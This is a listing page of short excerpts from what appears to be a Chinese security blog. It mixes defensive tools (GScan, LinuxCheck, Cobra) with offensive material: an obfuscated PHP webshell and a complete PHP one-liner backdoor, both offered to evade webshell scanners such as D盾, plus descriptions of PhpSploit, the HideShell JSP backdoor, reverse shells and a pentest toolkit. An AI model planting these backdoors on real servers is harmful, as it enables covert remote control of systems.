变量覆盖 extract() 该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。条件:若有EXTR_SKIP则不行。 <?php $a = "Original"; $my_array = array("a" =...
不再关注网络安全
GScan介绍 GScan是一个适用于安全应急响应人员对Linux主机排查时的安全工具。实现主机侧Checklist的全面自动化化扫描检测(包含常见检查项并可以自由扩展),根据检测结果自动数据聚合,进行黑客攻击路径溯源。 GScan界面 GScan Checklist扫描检查 GScan结果聚合保存 CheckList检测项 自动化程序的CheckList项如下: ...
之前给的过D盾一句话webshell现在都已被查杀,补个 <?php header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"\x47"; $_1='C'^"\x30"; $_2='A'^"\x32"; $_3='v'^"\x13"; $_4='J'^"\x38"; ...
Cobra介绍 Cobra是一款源代码安全审计工具,支持检测多种开发语言源代码中的大部分显著的安全问题和漏洞。 由于开发人员的技术水平和安全意识各不相同,导致可能开发出一些存在安全漏洞的代码。 攻击者可以通过渗透测试来找到这些漏洞,从而导致应用被攻击、服务器被入侵、数据被下载、业务受到影响等等问题。 “源代码安全审计”是指通...
PhpSploit Phpsploit 是一个远程控制框架,通过 HTTP 在客户机和 web 服务器之间提供隐蔽的交互式 shell 连接,能够为权限提升等目访问网络服务器。我们可理解为它是一款单webshell管理工具。 混淆通信是通过标准客户端请求下的 HTTP 头和 web 服务器的相对响应来完成的,通过一个一句话后门隧道: ...
一个可以绕过当前市面上几乎所有Webshell查杀的免杀PHP一句话木马脚本。 <?php /** * Noticed: (PHP 5 >= 5.3.0, PHP 7) * */ $password = "uedbox.com"; $wx = substr($_SERVER["HTTP_REFERER"],-7,-4); forward_static_call_array($wx."ert", array($_REQUEST[$password])); ?> ...
HideShell后门 HideShell是一个JSP后门木马,除了访问日志之外,还可以在Tomcat下隐藏任意JSP文件(实现隐藏webshell),隐藏访问日志。hideshell.jsp隐藏的JSP在下次重新引导Tomcat实例之前保持accessbile。 支持环境 Tomcat 7Tomcat 8 Hideshell.jsp通过简单删除目标来隐藏JSP文件,同时让Tomcat相信文件仍然存在,从而照常为...
什么是反弹shell reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell 通常用于被控端因防火墙受限、权限不足、端口被占用等情形 假设我...
LinuxCheck介绍 LinuxCheck是一个linux信息搜集小脚本,主要用于应急响应,在Debian或Centos下都可使用,功能: 信息搜集(端口、网络、用户信息、登陆信息,iptables、各种环境变量或配置文件等)异常检测(大文件,最近改动文件,SSH key,crontab,以及Linux常见后门检测)rkhunter扫描php webshell扫描 LinuxCheck安装使用 ...
K8tools 渗透工具包 声明: 工具仅供安全研究或授权渗透,非法用途后果自负。 综合工具 [+] 综合工具 K8飞刀Final.rar[+] K8data.mdb K8飞刀漏洞数据库20190402[+] K8expList.txt K8飞刀漏洞利用列表 提权工具 [+] 提权工具 iislpe.exe IIS全版本提权(仅限IIS帐户、服务帐户)[+] 提权工具 pr.exe pr有参版 pr0无参版(巴西烤...